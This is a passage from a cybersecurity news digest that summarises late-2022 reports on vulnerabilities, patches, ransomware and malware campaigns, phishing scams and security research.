National Laboratory (ANL) researchers discovered that some systems did not. An Idaho National Laboratory (INL) team also discovered that some systems were vulnerable to malicious firmware updates. This article continues to discuss the vulnerabilities of electric vehicle charging infrastructure.

    Sandia National Laboratories reports "Sandia Studies Vulnerabilities of Electric Vehicle Charging Infrastructure"

  • news

    Visible to the public "APT Group Pilfers $11 Million From Africa, Asia, Latin America Using Spear Phishing Emails"

    Group-IB recently published a report detailing the activities of the "OPERA1ER" Advanced Persistent Threat (APT) group, which is known for spear phishing emails, but it is unique in that it targets less economically developed countries in Africa, Asia, and Latin America. The APT group is suspected to be based in Africa because of the language used in its messages and its target selection. It has been difficult to track down, even though it has been active since 2018 and has carried out over a dozen successful attacks in some of those years. This APT group has been responsible for 35 known attacks totaling at least $11 million in damage. According to Group-IB, the actual amount could be as much as $30 million. The group primarily focuses on African countries and prefers businesses in the financial services, banking, and telecommunications industries. However, it is not afraid to occasionally venture outside of its comfort zone. With spear phishing campaigns, the group has also targeted businesses in Bangladesh, Paraguay, and Argentina. One distinguishing feature of the APT group is that it appears to use only off-the-shelf tools, rather than developing its own malware or ransomware. It is unusual for a group that does not build its own tools to last this long or be this financially successful. Part of that success is likely due to careful target selection in areas that do not see as many daily attempts as the world's largest economies. Another key to its success is a large network of "money mule" accounts used to make withdrawals and funnel funds to the APT group. Their spear phishing strategy is also referred to as "high quality," as it accurately imitates official government notices and communications from major banks. This article continues to discuss details surrounding the OPERA1ER APT group.

    CPO Magazine reports "APT Group Pilfers $11 Million From Africa, Asia, Latin America Using Spear Phishing Emails"

  • news

    Visible to the public "Resilience Seen as a Key to Critical Infrastructure Security"

    The recent string of major supply chain and critical infrastructure attacks highlighted threat actors' willingness to target those systems and the importance of organizations planning for such attacks and being able to recover from them when they occur. Incidents such as the software supply chain attacks on SolarWinds and Kaseya, as well as the ransomware attack on Colonial Pipeline, can have long-term consequences for customers and other organizations for months or even years. They can also make government agencies and defenders more aware of specific vulnerabilities and weak points that organizations have, as well as stimulate new thinking about how to address them. The DarkSide ransomware attack on the Colonial Pipeline, a major gas delivery conduit, exemplified the ever-increasing overlap between cybersecurity incidents and real-world consequences. Resilience is an important property for both critical infrastructure networks and enterprise networks, but it is not easy to achieve. Absorbing, responding to, and recovering from attacks are critical capabilities for security teams, but they need a thorough understanding of an organization's strengths and weaknesses, comprehensive planning, and the ability to redirect resources as needed. It also requires collaboration, both within and outside of the organization. The White House issued a fact sheet on critical infrastructure security, emphasizing the importance of increased collaboration with the private sector and a more attack-resistant approach. Although utilities, transportation systems, and other critical infrastructure components have all been shown to be vulnerable to cyberattacks, the good news is that many of these systems were built with resilience in mind from the start. Power companies, water companies, and rail operators must deal with a variety of disruptions on a regular basis and have contingency plans in place. This article continues to discuss the importance of bolstering resilience in critical infrastructure security.

    Decipher reports "Resilience Seen as a Key to Critical Infrastructure Security"

  • news

    Visible to the public "Firefox 107 Patches High-Impact Vulnerabilities"

    Mozilla recently announced the release of Firefox 107. The latest version of the popular web browser patches a significant number of vulnerabilities. A total of 19 CVE identifiers have been assigned to the security holes patched by Firefox 107, and nine of them have been assigned a "high impact" rating. Mozilla noted that the high-impact flaws include issues that could lead to information disclosure, fullscreen notification bypass that could be used for spoofing attacks, and crashes or arbitrary code execution resulting from use-after-free bugs. Multiple memory safety bugs discovered by Mozilla developers have been assigned a single CVE and a "high impact" rating. Mozilla stated that moderate-impact issues patched with the release of Firefox 107 can lead to security bypass, cross-site tracing, code execution, compromise via file downloads, keystroke leakage, and spoofing attacks. Low-impact issues patched in Firefox are related to security exceptions and spoofing. Some vulnerabilities only impact Firefox on Android or on all Unix-based operating systems. The researchers stated that many of these security holes have also been patched in Thunderbird with the release of version 102.5. Firefox is not as targeted by threat actors as Chrome, but its popularity still makes it a tempting target.

    SecurityWeek reports: "Firefox 107 Patches High-Impact Vulnerabilities"

  • news

    Visible to the public "Emerging Tech Can Protect Critical Infrastructure From Cyberattacks"

    The US President's Council of Advisors on Science and Technology (PCAST) met on November 9 to hear expert opinions on how to better build a cyber-resilient digital infrastructure at the national level, with current government officials backing a combination of emerging technologies and risk mitigation. The Defense Advanced Research Projects Agency (DARPA) has led efforts to fortify critical infrastructure using advanced data analytics and cybersecurity technology. Kathleen Fisher, DARPA's Information Innovation Office director, described an experiment in which her office developed sensor tools for power grids to distinguish cyberattacks from weather incidents. Failures caused by nature and accidents are very different from failures caused by cyber adversaries, she said during her presentation, emphasizing that cyber adversaries can make the system lie. In their Rapid Attack Detection, Isolation, and Characterization Systems (RADICS) program, DARPA tested a new sensor and corresponding algorithm to model power grids. RADICS successfully trained power engineers to black start a compromised power grid or restore a portion of an electric grid to operation without external power. The RADICS technology was created to detect incorrect data, isolate compromised communication channels and nodes, and implement new traffic analyses and Information Technology (IT) protocols. According to Fisher, DARPA's RADICS algorithm is now being used by several utility companies and independent state system operators. A key feature allowed electrical grid operators to conduct forensic analyses using both software and hardware to assess cyberattacks on a system and help restore grid operations in a timely manner. This article continues to discuss the RADICS program and the need for a combination of emerging technologies and risk mitigation for a cyber-resilient digital infrastructure.

    GCN reports "Emerging Tech Can Protect Critical Infrastructure From Cyberattacks"

  • news

    Visible to the public "Remote Code Execution Vulnerabilities Found in F5 Products"

    Security researchers at cybersecurity firm Rapid7 have identified several vulnerabilities and other potential security issues affecting F5 products. The researchers reported their findings to the vendor in mid-August and disclosed details on Wednesday, just as F5 released advisories to inform customers about the security holes and the availability of engineering hotfixes. Two of the issues discovered by the researchers have been described as high-severity remote code execution vulnerabilities and assigned CVE identifiers, while the rest are security bypass methods that F5 does not view as vulnerabilities. The most serious vulnerability is CVE-2022-41622, a cross-site request forgery (CSRF) issue affecting BIG-IP and BIG-IQ products. The researchers noted that exploitation can allow a remote, unauthenticated attacker to gain root access to a device's management interface, even if the interface is not exposed to the internet. However, exploitation requires the attacker to have some knowledge of the targeted network, and they need to convince a logged-in administrator to visit a malicious website that is set up to exploit CVE-2022-41622. The researchers stated that if exploited, the vulnerability can compromise the complete system. The second vulnerability, CVE-2022-41800, allows an attacker with admin privileges to execute arbitrary shell commands via RPM specification files. The researchers also identified several other security issues, including a local privilege escalation via bad Unix socket permissions and two SELinux bypass methods. The researchers believe that the widespread exploitation of these vulnerabilities is unlikely. However, the researchers stated that F5 customers should probably not ignore them, considering that BIG-IP appliances have been known to be targeted by threat actors.

    SecurityWeek reports: "Remote Code Execution Vulnerabilities Found in F5 Products"

  • news

    Visible to the public  "New Image-Based Scam Bypasses Filtering, Encourages Victims to Call Attacker"

    INKY Technology researchers have detailed a new image-based phishing scam that uses brand impersonation to encourage victims to call the scammers rather than click on a link or download a file. The researchers observed malicious actors using an image-based phishing technique in phone scams, involving sending a phishing email with the message embedded in an attached image. Phishers create an email, convert it to an image, and then send the image to their victims. As most email clients display the image file directly to the recipient rather than sending a blank email with an image attached, recipients will be unaware that they are viewing a screenshot rather than HTML code with text. The email also appears to be safe because there are no links or attachments to open. The goal of sending the phishing message via image is to avoid anti-spam and email security scanning because there is no text in the email. In one case, the researchers observed bad actors impersonating Geek Squad, with potential victims receiving an email stating that their Geek Squad subscription had been renewed for a year and that a large sum of money would be debited from their accounts within 24 hours. When recipients call the phone number listed in the email, they are given options to prevent the payment from going through, including the installation of remote access tools on their computers. Victims are then directed to a malicious website where banking information is requested, and victims are instructed to purchase gift cards in order to be reimbursed for the Geek Squad charges. The effectiveness of the technique is based on instilling fear in victims that they are about to be charged for goods or services they did not purchase. Those behind the scam hope that by eliciting an emotional response, they will impair victims' judgment and cause them to fall for the bait. This article continues to discuss the image-based phishing scam.

    SiliconANGLE reports "New Image-Based Scam Bypasses Filtering, Encourages Victims to Call Attacker"

  • news

    Visible to the public "Carnegie Mellon to Host NSA GenCyber Experience for Local High School Teachers"

    Carnegie Mellon University's (CMU) picoCTF for the National Security Agency (NSA) GenCyber Teacher Program is designed for local tri-state area high school computer science teachers in grades 10 through 12. The program will demonstrate to teachers how to incorporate online cybersecurity Capture-The-Flag (CTF) problems and competitions into the classroom to help students develop cybersecurity knowledge and skills. This initiative also aims to get students more interested in cyber-related careers. The 2023 camp will be held on CMU's Pittsburgh Campus from Monday, June 26 to Friday, June 30. Because space is limited, organizers advise interested teachers to sign up early to ensure their place in the program. According to the picoCTF website, the program provides free education opportunities on cybersecurity knowledge and skills typically taught at the Bachelor's/Master's level, such as cross-site scripting (XSS) attacks and their defenses, allowing participants to feel more comfortable using the content in their classrooms. The program also shows how all six GenCyber Cybersecurity Concepts and cyber ethics manifest in the design of secure computer systems, the practice of real-world cybersecurity professionals, and everyday cyber-computing experience. This article continues to discuss the 2023 picoCTF for GenCyber Teacher Program.

    CyLab reports "Carnegie Mellon to Host NSA GenCyber Experience for Local High School Teachers"

  • news

    Visible to the public "Google Ready to Roll Out Android Privacy Sandbox in Beta"

    Google recently announced plans to roll out Android Privacy Sandbox in beta starting early next year, delivering a more private advertising experience to mobile users. The initiative was initially announced in February, with the developer preview version of the feature being released in May. Google noted that Privacy Sandbox on Android is meant to limit the sharing of user data and prevent cross-app identifiers, such as advertising IDs, while supporting developers and businesses that are targeting mobile devices. In May, Google offered an early look at the SDK Runtime and Topics API associated with the Privacy Sandbox, allowing interested parties to test the technologies and plan adoption paths. Now, Google says it has improved and refined these tools based on the received feedback and that it will continue to deliver new features in developer preview while kicking off the beta rollout. Google stated that moving forth, developers interested in testing Privacy Sandbox APIs (including Topics, FLEDGE, and Attribution Reporting) will have to complete an enrollment process meant to verify their identity and gather data required by the APIs. Both ad tech and app developers interested in including these ads-related APIs as part of their solutions can participate. The researchers noted that the Privacy Sandbox beta will require developers to use an API level 33 SDK extension update set to be released soon. Google encourages companies that use third-party solutions for ad serving or ad measurement to work with their providers for participation in the testing of Privacy Sandbox.

    SecurityWeek reports: "Google Ready to Roll Out Android Privacy Sandbox in Beta"

  • news

    Visible to the public "Hard to Crack Hardware"

    In order to help defend against malicious attacks, next-generation electronic devices may include enhanced security systems built directly into their circuitry. According to KAUST researchers, protective "logic locks" based on an advanced branch of electronics known as spintronics could be incorporated into electronic chips' integrated circuits to bolster chip security. Yehia Massoud of KAUST says the need for hardware-based security features reflects the globalized nature of modern electronics manufacturing. Electronics companies typically use large specialized, external foundries to produce their chips, which reduces costs but introduces potential supply chain vulnerabilities. An untrustworthy foundry could illegally copy the circuit design for the production of counterfeit chips, or it could be maliciously modified by the incorporation of "hardware Trojans" into the circuitry that adversely affects its behavior in some way. Security approaches such as logic locking are now widely used to increase confidence in the globalized integrated circuit manufacturing chain, according to Divyanshu, a Ph.D. student in Massoud's labs. To protect chip security, the team created an integrated circuit logic lock based on a Magnetic Tunnel Junction (MTJ) component. This article continues to discuss advanced electronic components based on spintronic concepts that add more protection to smart devices.

    KAUST Discovery reports "Hard to Crack Hardware"

  • news

    Visible to the public  "Companies Caught off Guard by Holiday and Weekend Ransomware Attacks"

    Ransomware attackers are taking advantage of organizations having fewer security personnel available on weekends and holidays in order to launch more devastating attacks. According to a new Cybereason report, 44 percent of businesses reduce security staffing by up to 70 percent during holidays and weekends compared to weekday levels. Twenty-one percent cut staff by up to 90 percent. The study, which was based on a survey of over 1,200 cybersecurity professionals, discovered that attacks on weekends and holidays result in higher costs and revenue losses for organizations than attacks on weekdays. More than one-third of respondents who experienced a ransomware attack during the weekend or holiday report that their organizations lost more money, a 19 percent increase from 2021. Thirty-four percent of respondents whose organizations were attacked on a weekend or holiday say it took them longer to assemble their incident response team. Thirty-seven percent say it took them longer to assess the scope of the attack, and 36 percent say it took them longer to stop and recover from the attack. In the US, 44 percent of respondents said it took them longer to assess and respond to a weekend/holiday ransomware attack. The survey results show that traditional Monday through Friday staffing models are out of step with cyber threats and can leave organizations vulnerable. A ransomware attack has caused 88 percent of respondents to miss a holiday or weekend celebration. In addition, more than 90 percent of respondents in the financial services industry say they have missed out on family time. This article continues to discuss the impact of weekend/holiday ransomware attacks on companies.

    BetaNews reports "Companies Caught off Guard by Holiday and Weekend Ransomware Attacks"

  • news

    Visible to the public "Magento Stores Targeted in Massive Surge of TrojanOrders Attacks"

    At least seven hacking groups are responsible for a massive increase in 'TrojanOrders' attacks against Magento 2 websites, which exploit a vulnerability that allows threat actors to compromise vulnerable servers. Sansec, a website security firm, warned that the attacks are targeting nearly 40 percent of Magento 2 websites, with hacking groups fighting for control of an infected site. During a busy Black Friday and Cyber Monday period, these attacks are used to inject malicious JavaScript code into an online store's website, causing significant business disruption and massive customer credit card theft. The trend is expected to continue as we approach Christmas, when online retailers are at their most critical and vulnerable. The TrojanOrders attack exploits a critical Magento 2 vulnerability, tracked as CVE-2022-24086, which allows unauthenticated attackers to execute code and inject Remote Access Trojans (RATs) on unpatched websites. Adobe patched this flaw in February 2022, but Sansec says many Magento sites have remained unpatched. According to Sansec, at least a third of all Magento and Adobe Commerce stores have not yet been patched. Hackers typically create an account on the target website and place an order containing malicious template code in the name, VAT, or other fields when conducting TrojanOrders attacks. Once on the website, the attackers install a RAT to gain persistent access and the ability to perform more complex actions. This article continues to discuss findings regarding the increase in TrojanOrders attacks targeting Magento 2 websites.

    Bleeping Computer reports "Magento Stores Targeted in Massive Surge of TrojanOrders Attacks"

  • news

    Visible to the public "Euro Authorities Warn World Cup Fans Over Qatari Apps"

    European privacy experts warn FIFA World Cup attendees that their personal data may be at risk if they download two local tracking apps. The two apps in question are contract-tracing software Ehteraz, which football fans may be asked to download if they are forced to visit healthcare facilities during their stay in Qatar, and the official World Cup app Hayya. Hayya functions as a fan ID app that may be needed to gain entry into stadiums. However, concerns have been raised that it also tracks device location and network connections, even preventing devices from going into sleep mode. With 1.5 million fans expected to travel to the tiny Gulf state, several European governments have issued advice to mitigate privacy and security concerns. German data protection agency, BfDI, said that "the data processing of both apps probably goes much further" than their descriptions in the app store indicate. Among other things, one of the apps collects data on whether and with which number a telephone call is made. This sometimes involves sensitive telecommunications connection data. Neil Jones, director of cybersecurity evangelism at Egnyte, argued that the data collected by the apps could also be a treasure trove for would-be cyber-criminals. Jones stated that if you plan to travel to the event, he strongly recommends the purchase of a burner phone if the privacy-limiting capabilities cannot be disabled.

    Infosecurity reports: "Euro Authorities Warn World Cup Fans Over Qatari Apps"

  • news

    Visible to the public "Hundreds of Thousands of Emotet Attacks Spotted Daily After Four-Month Hiatus"

    After a four-month hiatus, the cybercriminals running the Emotet botnet operation are already among the most high-volume threat actors in the current cybersecurity landscape. According to Proofpoint, detections of Emotet payloads dropped off in July 2022 but reemerged in early November, and the botnet is now serving as a primary facilitator for the delivery of major malware strains. Emotet previously resumed operations in November 2021, less than a year after a law enforcement operation shut down its original infrastructure, which had been targeting businesses with malware for years. According to the company, it has been blocking hundreds of thousands of Emotet-related emails every day, making it one of the most extensive email threat campaigns. Following its historical patterns, Emotet demonstrated continued evolution in its behavior, including changes in lures, the malware's binary, and other malware dropped through successful campaigns. Palo Alto Networks' Unit 42 team discovered that both IcedID and Bumblebee malware strains were dropped onto a victim's machine in a single Emotet infection. The IcedID strain currently spreading via Emotet, is a more recent version with different commands and a new loader, which could indicate a change in ownership or a new relationship between the criminals running IcedID and those behind Emotet. Since 2021, when it was observed distributing The Trick and Qbot, Emotet has not demonstrated full functionality and consistent follow-on payload delivery that is not Cobalt Strike. The return of TA542 coincides with the delivery of IcedID, which is concerning. IcedID has previously been identified as a follow-on payload to Emotet infections, often leading to ransomware. IcedID can retrieve desktop information, running processes, and system information, among other things. It can also use command-and-control (C2) infrastructure to read and exfiltrate files. This article continues to discuss the impact of Emotet following its hiatus.

    ITPro reports "Hundreds of Thousands of Emotet Attacks Spotted Daily After Four-Month Hiatus"

  • news

    Visible to the public "LockBit Remains Most Prolific Ransomware in Q3"

    According to new research by researchers at Trellix, the infamous LockBit ransomware variant remained the most widespread in the third quarter of 2022, accounting for over a fifth (22%) of detections. The researchers noted that LockBit and Phobos were the most common ransomware families during Q3 2022. LockBit has been the most prolific variant of 2022 so far. The researchers noted that at the end of Q3, their "builder" was released, and allegedly various groups are already establishing their own RaaS with it. The researchers stated that Phobos ransomware continues to be active and accounts for 10% of ransomware attacks they observed. Their tactic of selling a complete ransomware kit and avoiding large organizations allows them to stay under the radar. The researchers noted that Germany recorded the highest detections of APT-related activity (29%) and the highest volume of ransomware (27%), while telecoms was the sector most impacted by ransomware, followed by transportation and shipping. The researchers claimed that the most active advanced threat groups during the quarter were the China-linked Mustang Panda, Russia's APT29, and Pakistan-linked APT36. Red team software Cobalt Strike remained a popular tool for threat actors, seen in a third (33%) of observed global ransomware activity and 18% of APT detections in Q3.

    Infosecurity reports: "LockBit Remains Most Prolific Ransomware in Q3"

  • news

    Visible to the public  "New RapperBot Campaign Targets Game Servers With DDoS Attacks"

    Fortinet FortiGuard Labs researchers discovered new RapperBot malware samples that are being used to build a Distributed Denial-of-Service (DDoS) botnet targeting game servers. The researchers discovered the previously undetected RapperBot Internet of Things (IoT) botnet in August and reported that it has been active since mid-June 2022. The botnet takes a large portion of its code from the original Mirai botnet, but unlike other IoT malware families, it includes the ability to brute-force credentials and gain access to Secure Shell (SSH) servers rather than Telnet, as Mirai does. Researchers have also noticed that the most recent samples include persistence-maintaining code, which is rarely implemented in other Mirai variants. The brute-forcing credential list was hardcoded into earlier samples of the malware, but starting in July, the samples began retrieving the list from the command-and -control (C2) server. RapperBot has been using self-propagation to maintain remote access to the brute-forced SSH servers since mid-July. The most recent samples also include DDoS attacks against the General Routing Encapsulation (GRE) protocol, possibly using Mirai source code, and the User Datagram Protocol (UDP) protocol used by a GTA game mod. The hardcoded credentials list consists of default credentials for IoT devices. The analysis of the malware's hardcoded prompt messages revealed that it primarily targets routers and DVRs. The most recent campaign targets older devices equipped with the Qualcomm MDM9625 chipset, such as LTE modems. Once inside the device, it sends the credentials used, the compromised device's IP address, and its architecture to the C2 server via a separate port, 5123. The malware then attempts to install the RapperBot payload binary on the infected device. This article continues to discuss the discovery of new RapperBot samples used to build a botnet to launch DDoS attacks against game servers.

    Security Affairs reports "New RapperBot Campaign Targets Game Servers With DDoS Attacks"

  • news

    Visible to the public "Cloud Data Protection Trends You Need to Be Aware Of"

    Veeam Software has released its "Cloud Protection Trends Report 2023," which covers four key "as a Service" scenarios: Infrastructure-as-a-Service (IaaS), Platform-as-a-Service (PaaS), Software-as-a-Service (SaaS), and Backup and Disaster Recovery-as-a-Service (BaaS/DRaaS). According to the survey, businesses are becoming more aware of the need to protect their SaaS environments. For example, almost 90 percent of Microsoft 365 customers surveyed use supplemental measures in addition to built-in recovery capabilities. Preparing for a quick recovery from cyber and ransomware attacks was the most frequently cited reason for this backup, with regulatory compliance coming in second. According to Danny Allan, CTO and SVP of Product Strategy at Veeam, the growing adoption of cloud-powered tools and services, increased by the shift to remote work and current hybrid work environments, has put a spotlight on hybrid IT and data protection strategies across industries. As cybersecurity threats grow, organizations must look beyond traditional backup services to develop a strategic approach that best meets their business needs and cloud strategy. The findings of this survey reveal that workloads continue to move fluidly from data centers to clouds and back again, as well as from one cloud to another, adding to the complexity of data protection strategy. According to the findings of this survey, while modern IT enterprises have made significant advances in cloud and data protection, there is still work to be done. This article continues to discuss key findings from Veeam's Cloud Protection Trends Report 2023.

    Help Net Security reports "Cloud Data Protection Trends You Need to Be Aware Of"

  • news

    Visible to the public "Wipermania: Malware Remains a Potent Threat, 10 Years Since 'Shamoon'"

    Since the "Shamoon" virus rendered nearly 30,000 client and server systems at Saudi Aramco inoperable more than ten years ago, destructive wiper malware still remains a major threat to enterprise organizations. Max Kersten, a malware analyst at Trellix, recently examined more than 20 wiper families that threat actors have used in various attacks since the year's beginning. Kersten's analysis included a comparison of the technical aspects of the various wipers, including their similarities and differences. The analysis covered wipers used extensively by threat actors against Ukrainian targets, particularly just before Russia invaded the country, as well as more generic wipers found in the wild. His research revealed that the evolution of wipers since Shamoon has been vastly different from that of other types of malware tools. The malware used by threat actors in espionage campaigns has become increasingly sophisticated and complex over time, whereas wipers have evolved very little, despite remaining as destructive as ever. Kersten believes that much of this is due to how and why threat actors use them. In contrast to spyware and other malware for targeted attacks and cyber espionage, adversaries have little incentive to develop new functionality for hiding wipers on a network once they have snuck it on there in the first place. Wipers, by definition, work to erase or overwrite data on computers and are thus loud and visible once launched. This article continues to discuss findings from Kersten's in-depth analysis of system-destroying malware families.

    Dark Reading reports "Wipermania: Malware Remains a Potent Threat, 10 Years Since 'Shamoon'"

  • news

    Visible to the public "Researchers Discover Hundreds of Amazon RDS Instances Leaking Users' Personal Data"

    New research from Mitiga, a cloud incident response company, reveals that hundreds of databases on Amazon Relational Database Service (Amazon RDS) are exposing Personally Identifiable Information (PII). According to researchers, this kind of PII leakage presents threat actors with a potential gold mine, either for extortionware/ransomware campaigns or the reconnaissance stage of the cyber kill chain. Names, email addresses, phone numbers, dates of birth, marital status, information on rented cars, and even company logins are included in the leak. Relational databases can be set up in the Amazon Web Services (AWS) cloud using Amazon RDS. Various database engines are supported, including MariaDB, MySQL, Oracle, PostgreSQL, and SQL Server. Public RDS snapshots, a feature that enables the creation of a backup of the entire database environment running in the cloud and is accessible by all AWS accounts, is the primary cause of the leaks. According to Amazon's documentation, users must ensure that none of their private information is present in the public snapshot before sharing it. When a snapshot is made publicly available, all AWS accounts have the ability to copy it and use it to build database instances. The researchers discovered 810 snapshots that were publicly shared for varying lengths of time, ranging from a few hours to weeks, making them susceptible to abuse by malicious actors. The research was conducted from September 21, 2022, to October 20, 2022. Over 250 of the 810 snapshots' backups were visible for 30 days or more, indicating that they were probably forgotten. This article continues to discuss the exposure of PII by hundreds of databases on Amazon RDS.

    THN reports "Researchers Discover Hundreds of Amazon RDS Instances Leaking Users' Personal Data"

  • news

    Visible to the public "MC2 Researchers Present Six Papers at ACM Security Conference"

    Six papers from researchers affiliated with the Maryland Cybersecurity Center (MC2) were accepted for presentation at the 2022 Association for Computing Machinery Conference on Computer and Communications Security (ACM CCS). The annual conference gathers information security researchers, practitioners, developers, and users worldwide. According to Michelle Mazurek, associate professor of computer science and director of MC2, MC2 faculty, students, and postdocs have produced work on the web's certificate infrastructure, hardware security, secure software development, and more. One of the papers that received an honorable mention is "Hammurabi: A Framework for Pluggable, Logic-Based X.509 Certificate Validation Policies," which introduces a framework that decouples the certificate processing mechanism from the certificate validation policy. In this framework, the researchers show that they can express the complex policies of the Google Chrome and Mozilla Firefox web browsers. They confirm Hammurabi policies' accuracy by comparing their validation decisions to those of browsers on over 10 million certificate chains derived from certificate transparency logs, as well as 100,000 synthetic chains. "When Frodo Flips: End-to-End Key Recovery on FrodoKEM via Rowhammer," the second honorable mention paper, examines defending post-quantum cryptography systems from active side-channel attacks. The researchers use Rowhammer to demonstrate the first end-to-end implementation of a successful key recovery attack against FrodoKEM, a quantum-resistant public key cryptographic algorithm. They begin by launching Rowhammer, a security exploit, in order to poison FrodoKEM's KeyGen process. Then, they use a supercomputer to extract private-key material and synthesize it with a customized key-recovery algorithm. On a standard laptop, any individual FrodoKEM-encrypted session-key can be recovered in about two minutes. This article continues to discuss papers developed by MC2 researchers that were accepted by the ACM security conference.

    UMIACS reports "MC2 Researchers Present Six Papers at ACM Security Conference"

  • news

    Visible to the public "Commercial Repair Shops Caught Snooping on Customer Data by Canny Canadian Research Crew"

    Computer scientists at the University of Guelph in Canada discovered that electronics repair services lack effective privacy protocols. In addition, the researchers found that technicians often snoop on customers' data. The team describes how they tested the privacy policies and practices of electronics repair shops in a four-part research study titled "No Privacy in the Electronics Repair Industry." The study included a field survey of 18 North American repair service providers, including three national, three regional, and five local providers, as well as two national smartphone repair service providers and five device manufacturers. Representatives from these companies were questioned about whether they have privacy policies and how they treat customer data. Then, repair personnel were instructed to replace the batteries in Asus UX330U laptops running Microsoft Windows 10, a fix that should not require the use of login credentials or operating system access. However, all but one of the firms requested login information. According to the paper, none of the service providers posted any notice informing customers about their privacy policies. Similarly, no researcher was informed about a privacy policy, their rights as a customer, or how to protect their data until the devices were handed over. Only three national and three regional service providers offered a terms and conditions document to be signed when the laptops were provided. These agreements disclaimed liability for any data loss. After evaluating the privacy policies of these repair shops, the researchers put the technicians' actual privacy practices to the test by providing them with rigged Windows laptops loaded with dummy data that secretly recorded how the repair staff used the devices. The findings were not encouraging, as six of the sixteen technicians snooped on customers' data. Technicians copied customer data to external devices in two of the sixteen tests. One of the six snoopers tried to avoid generating evidence, while the three took steps to conceal their activities. The device logs show that the offending technicians attempted to hide their tracks by deleting items from Microsoft Windows' "Quick Access" or "Recently Accessed Files" folders. This article continues to discuss findings from the study on electronics repair services' privacy policies and practices.

    The Register reports "Commercial Repair Shops Caught Snooping on Customer Data by Canny Canadian Research Crew"

  • news

    Visible to the public "Researchers Break Security Guarantees of TTE Networking Used in Spacecraft"

    Time-Triggered Ethernet (TTE) is an example of a mixed-criticality network that can route traffic with varying levels of timing and fault tolerance requirements over the same set of hardware. Previously, spacecraft relied on one network to transmit safety-critical or mission-critical messages and one or more completely separate networks to carry video conferencing and other types of less-critical traffic. Orion is the first spacecraft to use a TTE network to route mixed-criticality traffic, including for vital systems such as navigation and life support, as well as for file transfers that are critical for delivery but not timing and non-critical tasks like crew video conferencing. TTE, which will also be used in NASA's Lunar Gateway space station and the European Space Agency's (ESA) Ariane 6 launcher, is critical for reducing modern spacecraft size, weight, cost, and power requirements. Safety-critical systems, such as those used for steering and engine control, typically require network messages to be sent and received at intervals as short as 40 to 50 milliseconds. If messages are delayed or dropped, there can be disastrous consequences. On the other end of the criticality spectrum, messages are sent by scientific instruments, which are often in the form of commercial off-the-shelf devices provided by universities or outside researchers with minimal safety review from the National Aeronautics and Space Administration (NASA). While fully compatible with the Ethernet standard, TTE can also deliver messages that engineers normally reserve for special-purpose networks. TTE provides two key benefits not available in regular Ethernet to prevent less-important messages from interfering with critical ones. They include a time-triggered paradigm in which all devices are tightly synchronized and send messages according to a set schedule. Another advantage is fault tolerance, as TTE replicates the entire network into multiple planes and simultaneously forwards messages across all planes. Researchers from the University of Michigan, the University of Pennsylvania, and NASA's Johnson Space Center recently published findings that breach TTE's isolation guarantees for the first time. PCspooF is a type of attack in which a single non-critical device connected to a single plane can disrupt synchronization and communication between TTE devices on all planes. The attack works through the exploitation of a flaw in the TTE protocol. This article continues to discuss TTE and the study that broke the security guarantees of TTE networking.

    Ars Technica reports "Researchers Break Security Guarantees of TTE Networking Used in Spacecraft"

  • news

    Visible to the public "FBI Director Say He's 'Extremely Concerned' About China's Ability to Weaponize TikTok"

    On Tuesday, during a House Homeland Security Committee hearing on worldwide threats, FBI Director Christopher Wray told Congress he is "extremely concerned" that Beijing could weaponize data collected through TikTok, the wildly popular app owned by the Chinese company ByteDance. Wray stated that application programming interfaces, or APIs, that ByteDance embeds in TikTok are a national security concern since Beijing could use them to "control data collection of millions of users or control the recommendation algorithm, which can be used for influence operations." Wray noted that while America faces cyber threats from various nations, "China's fast hacking program is the world's largest, and they have stolen more Americans' personal and business data than every other nation combined." Wray stated that APIs in TikTok could be harnessed by China to control software on millions of devices, meaning the Chinese government could conceivably technically compromise Americans' personal devices.

    CyberScoop reports: "FBI Director Say He's 'Extremely Concerned' About China's Ability to Weaponize TikTok"

  • news

    Visible to the public "Lazarus Backdoor DTrack Evolves to Target Europe and Latin America"

    According to researchers at Kaspersky, the backdoor DTrack, widely used by the North Korean Lazarus group over the last three years, is still being deployed to target organizations in Europe and the US. DTrack has been used in financial environments to breach ATMs, ransomware attacks, and campaigns against a nuclear power plant in India. The researchers stated that DTrack allows criminals to upload, download, start or delete files on the victim host. Among the downloaded and executed files already found in the standard DTrack toolset, the researchers spotted a keylogger, a screenshot maker, and a module for gathering victims' system information. The researchers noted that with a toolset like this, criminals can implement lateral movement into the victims' infrastructure in order to, for example, retrieve compromising information. From a technical standpoint, the researchers said that DTrack had not changed substantially over time, but the threat actors behind it made some "interesting" modifications. The researchers stated that DTrack hides itself inside an executable that looks like a legitimate program, and there are several stages of decryption before the malware payload starts. After these stages, and once the final payload is decrypted, it is loaded using process hollowing into the explorer.exe process. The researchers noted that in previous DTrack samples, the libraries to be loaded were obfuscated strings. In more recent versions, they use API hashing to load the proper libraries and functions. Another small change is that three C2 servers are used instead of six. Regarding targeted organizations, Kaspersky detected DTrack activity in Germany, Brazil, India, Mexico, Switzerland, Italy, Saudi Arabia, Turkey, and the US. Affected sectors include education, chemical manufacturing, governmental research and policy institutes, as well as IT service providers, utility providers, and telecommunications.

    Infosecurity reports: "Lazarus Backdoor DTrack Evolves to Target Europe and Latin America"

  • news

    Visible to the public "GAO Tells DOD to Ensure Cyber Incidents are Properly Reported and Shared"

    According to a new Government Accountability Office (GAO) report, the Department of Defense (DOD) has not fully implemented its cyber incident management processes. The government watchdog also discovered flaws in data reporting and management. The DOD and the US Defense Industrial Base (DIB) rely heavily on information systems to carry out their missions. Malicious actors continue to target these systems, as the DOD has experienced more than 12,000 cyber incidents since 2015. Chinese hackers breached five US defense and technology firms in November and December 2021, obtaining passwords in order to gain access to the systems of the organizations and intercept sensitive communications. Hackers breached the Defense Information Systems Agency's (DISA) network between May and July 2019, potentially compromising personal information. Furthermore, in February 2017, an Iranian hacker group targeted DIB actors in a campaign to steal credentials and other data. The vast majority of cyber incidents reported are malicious logic incidents, which involve the installation of software designed and/or deployed by adversaries with malicious intentions in order to gain access to resources or information without the user's consent or knowledge. Other incidents include root-level intrusion, user-level intrusion, and Denial-of-Service (DoS) attacks. In order to combat the cyber threat, the DOD has established two incident management processes, one of which is for all incidents and one for critical incidents. The GAO acknowledged the efforts already made by the DOD and the DIB, which have resulted in a decrease in the number of incidents reported from a high of 3,880 in 2015 to 948 in 2021. However, despite this reduction, the GAO discovered that the DOD's system for reporting all incidents often contained incomplete information, and the DOD could not always demonstrate that relevant critical incidents had been notified to appropriate leadership. This article continues to discuss the GAO report on DOD cybersecurity regarding the need to ensure cyber incidents are appropriately reported and shared.

